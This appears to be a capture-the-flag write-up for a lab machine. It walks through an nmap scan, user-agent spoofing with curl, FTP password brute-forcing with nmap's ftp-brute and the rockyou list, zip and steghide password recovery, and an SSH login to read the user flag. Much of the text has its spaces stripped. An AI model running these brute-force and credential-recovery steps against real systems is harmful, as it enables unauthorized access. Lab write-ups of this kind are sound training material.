$nmap-sC-sV-p--oNnmap.out10.10.124.244Nmapscanreportfor10.10.124.244Hostisup (0.20s latency).Notshown:65532closedportsPORTSTATESERVICEVERSION21/tcpopenftpvsftpd3.0.322/tcpopensshOpenSSH7.6p1Ubuntu4ubuntu0.3 (Ubuntu Linux; protocol2.0)|ssh-hostkey:|2048ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)|2565e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)|_2562d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)80/tcpopenhttpApachehttpd2.4.29 ((Ubuntu))|_http-server-header:Apache/2.4.29 (Ubuntu)|_http-title:AnnoucementServiceInfo:OSs:Unix,Linux; CPE:cpe:/o:linux:linux_kernelServicedetectionperformed.Pleasereportanyincorrectresultsathttps://nmap.org/submit/.# Nmap done at Tue Jun 15 14:21:00 2021 -- 1 IP address (1 host up) scanned in 432.82 seconds
How you redirect yourself to a secret page?
Answer: user-agent
What is the agent name?
Answer: chris
Steps to Reproduce:
Use curl with the following options
A - User agent (The value of user agent must be C as mentioned in the Hint)
L - Follow redirects
$curl-LAChttp://10.10.124.244/Attentionchris,<br><br>Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>
From,<br>AgentR
Hash cracking and brute-force
FTP password
Answer: crystal
Steps to Reproduce:
Use nmap or hydra:
$ nmap --script ftp-brute --script-args userdb=users.txt,passdb=/usr/share/wordlists/rockyou.txt -p 21 -oN ftp-brute.out 10.10.124.244
Nmapscanreportfor10.10.124.244Hostisup (0.17s latency).PORTSTATESERVICE21/tcpopenftp|ftp-brute:|Accounts:|chris:crystal-Validcredentials|_Statistics:Performed261guessesin174seconds,averagetps:2.5# Nmap done at Tue Jun 15 14:41:53 2021 -- 1 IP address (1 host up) scanned in 200.60 seconds
$catTo_agentJ.txtDearagentJ,All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,AgentC
$7zxdata.zip7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21p7zip Version 16.02 (locale=en_US.utf8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz (806EA),ASM,AES-NI)
Scanningthedriveforarchives:1file,280bytes (1 KiB)Extractingarchive:data.zip--Path=data.zipType=zipPhysicalSize=280Enterpassword (will notbeechoed):EverythingisOkSize:86Compressed:280
Contents of To_agentR.txt:
$ cat To_agentR.txt
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R
Base64 Decoding to get the password:
$echoQXJlYTUx|base64-dArea51
Who is the other agent (in full name)?
Answer: James
Steps to Reproduce:
Use the passphrase to extract the contents from cute-alient.jpg using steg-hide:
$steghideextract-sfcute-alien.jpgEnterpassphrase:wroteextracteddatato"message.txt".$catmessage.txtHijames,Gladyoufindthismessage.Yourloginpasswordishackerrules!Don't ask me why the password look cheesy, ask agent R who set this password for you.Your buddy,chris
SSH password
Answer: hackerrules!
Capture the user flag
What is the user flag?
Login using ssh to find the user flag:
shjames@10.10.124.244Theauthenticityofhost'10.10.124.244 (10.10.124.244)'can't be established.ECDSA key fingerprint is SHA256:yr7mJyy+j1G257OVtst3Zkl+zFQw8ZIBRmfLi7fX/D8.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.10.124.244' (ECDSA) to the list of known hosts.james@10.10.124.244'spassword:WelcometoUbuntu18.04.3LTS (GNU/Linux 4.15.0-55-genericx86_64)*Documentation:https://help.ubuntu.com*Management:https://landscape.canonical.com*Support:https://ubuntu.com/advantageSysteminformationasofTueJun1509:48:48UTC2021Systemload:0.0Processes:97Usageof/:39.8%of9.78GBUsersloggedin:0Memoryusage:34%IPaddressforeth0:10.10.124.244Swapusage:0%75packagescanbeupdated.33updatesaresecurityupdates.Lastlogin:TueOct2914:26:272019james@agent-sudo:~$lsAlien_autospy.jpguser_flag.txtjames@agent-sudo:~$catuser_flag.txtREDACTED